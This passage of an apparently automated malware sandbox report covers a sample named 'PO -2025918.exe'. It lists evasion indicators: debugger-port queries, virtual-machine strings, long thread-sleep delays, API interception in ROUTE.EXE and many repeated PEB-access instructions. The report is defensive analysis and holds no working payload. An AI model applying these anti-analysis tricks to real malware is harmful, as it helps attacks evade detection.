                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: PO -2025918.exe PID: 6680, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 2540000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 2750000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 4750000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 8E20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 9E20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: A040000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: B040000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E rdtsc 4_2_01BD096E
                      Source: C:\Users\user\Desktop\PO -2025918.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4035
                      Source: C:\Users\user\Desktop\PO -2025918.exe API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\PO -2025918.exe TID: 6756 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4304 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476 Thread sleep count: 39 > 30
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476 Thread sleep time: -78000s >= -30000s
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540 Thread sleep time: -60000s >= -30000s
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose, 9_2_00AAC600
                      Source: PO -2025918.exe, 00000000.00000002.1894470547.0000000007342000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3540722904.0000000001570000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2423878838.00000260B784C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\PO -2025918.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Process queried: DebugPort
                      Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00417A63 LdrLoadDll, 4_2_00417A63
                      Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C561C3 mov eax, dword ptr fs:[00000030h] 4_2_01C561C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C18243 mov eax, dword ptr fs:[00000030h]4_2_01C18243
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C18243 mov ecx, dword ptr fs:[00000030h]4_2_01C18243
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8823B mov eax, dword ptr fs:[00000030h]4_2_01B8823B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A250 mov eax, dword ptr fs:[00000030h]4_2_01C4A250
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A250 mov eax, dword ptr fs:[00000030h]4_2_01C4A250
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C6625D mov eax, dword ptr fs:[00000030h]4_2_01C6625D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8826B mov eax, dword ptr fs:[00000030h]4_2_01B8826B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h]4_2_01B94260
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h]4_2_01B94260
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h]4_2_01B94260
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B96259 mov eax, dword ptr fs:[00000030h]4_2_01B96259
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8A250 mov eax, dword ptr fs:[00000030h]4_2_01B8A250
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB45B1 mov eax, dword ptr fs:[00000030h]4_2_01BB45B1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB45B1 mov eax, dword ptr fs:[00000030h]4_2_01BB45B1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE59C mov eax, dword ptr fs:[00000030h]4_2_01BCE59C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC4588 mov eax, dword ptr fs:[00000030h]4_2_01BC4588
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B92582 mov eax, dword ptr fs:[00000030h]4_2_01B92582
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B92582 mov ecx, dword ptr fs:[00000030h]4_2_01B92582
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC5ED mov eax, dword ptr fs:[00000030h]4_2_01BCC5ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC5ED mov eax, dword ptr fs:[00000030h]4_2_01BCC5ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B925E0 mov eax, dword ptr fs:[00000030h]4_2_01B925E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h]4_2_01C105A7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h]4_2_01C105A7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h]4_2_01C105A7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B965D0 mov eax, dword ptr fs:[00000030h]4_2_01B965D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA5D0 mov eax, dword ptr fs:[00000030h]4_2_01BCA5D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA5D0 mov eax, dword ptr fs:[00000030h]4_2_01BCA5D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE5CF mov eax, dword ptr fs:[00000030h]4_2_01BCE5CF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE5CF mov eax, dword ptr fs:[00000030h]4_2_01BCE5CF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C26500 mov eax, dword ptr fs:[00000030h]4_2_01C26500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h]4_2_01BC656A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h]4_2_01BC656A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h]4_2_01BC656A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98550 mov eax, dword ptr fs:[00000030h]4_2_01B98550
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98550 mov eax, dword ptr fs:[00000030h]4_2_01B98550
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC44B0 mov ecx, dword ptr fs:[00000030h]4_2_01BC44B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B964AB mov eax, dword ptr fs:[00000030h]4_2_01B964AB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B904E5 mov ecx, dword ptr fs:[00000030h]4_2_01B904E5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A49A mov eax, dword ptr fs:[00000030h]4_2_01C4A49A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1A4B0 mov eax, dword ptr fs:[00000030h]4_2_01C1A4B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A456 mov eax, dword ptr fs:[00000030h]4_2_01C4A456
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h]4_2_01B8E420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h]4_2_01B8E420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h]4_2_01B8E420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8C427 mov eax, dword ptr fs:[00000030h]4_2_01B8C427
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1C460 mov ecx, dword ptr fs:[00000030h]4_2_01C1C460
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h]4_2_01BC8402
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h]4_2_01BC8402
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h]4_2_01BC8402
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h]4_2_01BBA470
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h]4_2_01BBA470
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h]4_2_01BBA470
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB245A mov eax, dword ptr fs:[00000030h]4_2_01BB245A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8645D mov eax, dword ptr fs:[00000030h]4_2_01B8645D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C107C3 mov eax, dword ptr fs:[00000030h]4_2_01C107C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B907AF mov eax, dword ptr fs:[00000030h]4_2_01B907AF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1E7E1 mov eax, dword ptr fs:[00000030h]4_2_01C1E7E1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B947FB mov eax, dword ptr fs:[00000030h]4_2_01B947FB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B947FB mov eax, dword ptr fs:[00000030h]4_2_01B947FB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3678E mov eax, dword ptr fs:[00000030h]4_2_01C3678E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h]4_2_01BB27ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h]4_2_01BB27ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h]4_2_01BB27ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C447A0 mov eax, dword ptr fs:[00000030h]4_2_01C447A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9C7C0 mov eax, dword ptr fs:[00000030h]4_2_01B9C7C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC273C mov eax, dword ptr fs:[00000030h]4_2_01BC273C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC273C mov ecx, dword ptr fs:[00000030h]4_2_01BC273C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC273C mov eax, dword ptr fs:[00000030h]4_2_01BC273C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C14755 mov eax, dword ptr fs:[00000030h]4_2_01C14755
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC720 mov eax, dword ptr fs:[00000030h]4_2_01BCC720
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC720 mov eax, dword ptr fs:[00000030h]4_2_01BCC720
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1E75D mov eax, dword ptr fs:[00000030h]4_2_01C1E75D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90710 mov eax, dword ptr fs:[00000030h]4_2_01B90710
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC0710 mov eax, dword ptr fs:[00000030h]4_2_01BC0710
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC700 mov eax, dword ptr fs:[00000030h]4_2_01BCC700
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98770 mov eax, dword ptr fs:[00000030h]4_2_01B98770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h]4_2_01BA0770
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90750 mov eax, dword ptr fs:[00000030h]4_2_01B90750
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2750 mov eax, dword ptr fs:[00000030h]4_2_01BD2750
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2750 mov eax, dword ptr fs:[00000030h]4_2_01BD2750
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0C730 mov eax, dword ptr fs:[00000030h]4_2_01C0C730
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC674D mov esi, dword ptr fs:[00000030h]4_2_01BC674D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC674D mov eax, dword ptr fs:[00000030h]4_2_01BC674D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC674D mov eax, dword ptr fs:[00000030h]4_2_01BC674D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC66B0 mov eax, dword ptr fs:[00000030h]4_2_01BC66B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC6A6 mov eax, dword ptr fs:[00000030h]4_2_01BCC6A6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94690 mov eax, dword ptr fs:[00000030h]4_2_01B94690
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94690 mov eax, dword ptr fs:[00000030h]4_2_01B94690
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C106F1 mov eax, dword ptr fs:[00000030h]4_2_01C106F1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C106F1 mov eax, dword ptr fs:[00000030h]4_2_01C106F1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h]4_2_01C0E6F2
